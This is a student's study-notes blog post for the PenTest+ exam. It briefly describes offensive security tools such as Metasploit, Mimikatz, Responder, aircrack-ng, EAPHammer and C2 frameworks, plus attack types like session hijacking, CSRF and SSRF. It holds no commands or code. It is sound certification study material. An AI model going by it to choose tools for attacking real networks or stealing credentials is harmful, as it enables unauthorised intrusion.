Yuki's Blog

Pentest+ Tools

By Yuki Han in , ,
Pentest+ Tools

Tools to know for PenTest+ and what they do.


.・。.・゜✭・.・✫・゜・。.


Table of Contents

  1. Tools
  2. Attacks


.・。.・゜✭・.・✫・゜・。.


┌──❀̥˚───────────────────────────────────────────────❀̥˚─┐

Tools

✧. ┊  ToolsLAN AttacksWLAN AttacksWLAN Attack for PasswordMobile ToolsSystem HackingRemote Access Tools  ┊ .✧

medusa brutespray hydra


Tools

ೃ⁀➷ Metasploit

Security & penetration testing framework that allows mixing and matching scanners, exploits, and payloads.

ೃ⁀➷ Meterpreter

Most popular Metasploit payload (program that runs on target once compromised) which includes an interactive menu based list of commands to run on the target.

ೃ⁀➷ msfvenom

Part of the Metaspoloit Framework that can create malicious app packages for Android devices or other platforms/architectures

ೃ⁀➷ Nikto

Kali Linux open source web server scanner tool that does comprehensive testing on web servers for vulnerabilities

ೃ⁀➷ Mimikatz

Post-exploitation tool to extract sensitive credentials from Windows from memory


LAN attacks

ೃ⁀➷ Impacket

Open source tool collection for Windows and working on LAN. Can do NTLM, Kerberos authentication attack, credential dumping, pass the hash attacks, and packet sniffing.

ೃ⁀➷ Responder

Kali Linux command line tool that can poison NetBIOS, LLMNR, and MDNS name resolution requests

ೃ⁀➷ mitm6

IPv6 DNS hijacking tool that will use bogus IP addresses to redirect victims to other malicious hosts


WLAN attacks

ೃ⁀➷ Aircrack-ng

Wireless network security testing using command line tools to do wireless monitoring, attacking, testing, and password cracking.

ೃ⁀➷ Airmon-ng

Tool in the aircrack-ng suite that enables/disables monitor mode on wireless interface, or switch from managed to monitor mode

ೃ⁀➷ Airodump-ng

Tool in aircrack-ng suite that can capture 802.11 frames and use output to ID the MAC address of access points or victim client devices

ೃ⁀➷ Aireplay-ng

Tool in aircrack-ng suite that can inject frames to get authentication credentials for access point using a deauthentication attack

ೃ⁀➷ Kismet

Kali Linux tool that can capture packets, act as wireless IDS, and can preserve any caught handshake packets to try to crack password later

ೃ⁀➷ Wifite2

Wireless auditing tool to assess WLAN. Site survey, ID active targetes, lists known targets and hidden access points. Can do WPS brute force PIN attack, WPS Pixie Attack, WPA crack attempt, and WPA Pairwise Master Key Identifier (PMKID) crack attempt

ೃ⁀➷ Spooftooph

Tool that can spoof or clone Bluetooth device

ೃ⁀➷ WiGLE

Site dedicated to mapping and indexing access points


WLAN Attack for Password

ೃ⁀➷ Fern

Python-based program to test wireless networks, can recover WEP, WPS, WPA keys through dictionary attacks, bruteforce, session hijacking, replay attacks, and man in the middle attacks.

ೃ⁀➷ EAPHammer

Python-based toolkit in Kali which can launch attacks on WPA2-Enterprise 802.11a/n network. Can launch karma attacks using evil twin, steal RADIUS credentials, conceal/cloak SSID, perform captive portal attacks and capture AD credentials

ೃ⁀➷ MDK4

Linux based tool that can do many attacks


Mobile Tools

ೃ⁀➷ Frida

Open source tool that can dump process memory, examine plaintext data being passed, in-process fuzzing, anti-jailbreak/root detection, etc

ೃ⁀➷ Objection

Runtime exploration toolkit for IOS devices that is a scriptable debugger. Can run custom Frida scripts


System Hacking

ೃ⁀➷ Empire

C2 (Command and Control) framework using PowerShell for post-exploitation tasks

ೃ⁀➷ Covenant

.NET C2 framework that shows attack surface of .NET

ೃ⁀➷ Mythic

C2 framework which is particularly good for MacOS


Remote Access Tools

ೃ⁀➷ Netcat

Command line utility to read from or write to TCP/UDP/Unix domain socket network connections. Can act as simple proxy/relay, transfer files, launch executables, test services/daemomns, port scan, etc.

ೃ⁀➷ Secure Shell (SSH)

Communication securely, replaces Telnet, securely issue commands and copy files over network, remotely manage servers and other devices

ೃ⁀➷ rsh/rlogin

Linux command where you may not need to supply credentials. Can open a shell and give ability to execute commands

└───❀̥˚───────────────────────────────────────────────❀̥˚┘


.・。.・゜✭・.・✫・゜・。.


┌──❀̥˚───────────────────────────────────────────────❀̥˚─┐

Attacks

ೃ⁀➷ Session hijacking

Stealing session credential from user’s browser and impersonating that user

ೃ⁀➷ Session fixation

Impersonating a user using a known session identifier (Social engineering and using a fake login page using known SID)

ೃ⁀➷ Session replay

Man in the middle, having access to user authentication process and intercepting and repeating it


ೃ⁀➷ Cross-site request forgery (XSRF/CSRF)

Attacker takes advantage of trust established between user and website. EX: trust in a user’s unexpired browser cookies AKA session riding, one-click attack

ೃ⁀➷ Server-side request forgery (SSRF)

Attacker takes advantage of trust established between server and resources the server can access

└───❀̥˚───────────────────────────────────────────────❀̥˚┘

Share: Twitter Facebook
Yuki Han's Picture

About Yuki Han

Yuki is a curious college student who wants to take a deep dive into information security.

CA, USA https://yukisbitsandbytes.github.io

Comments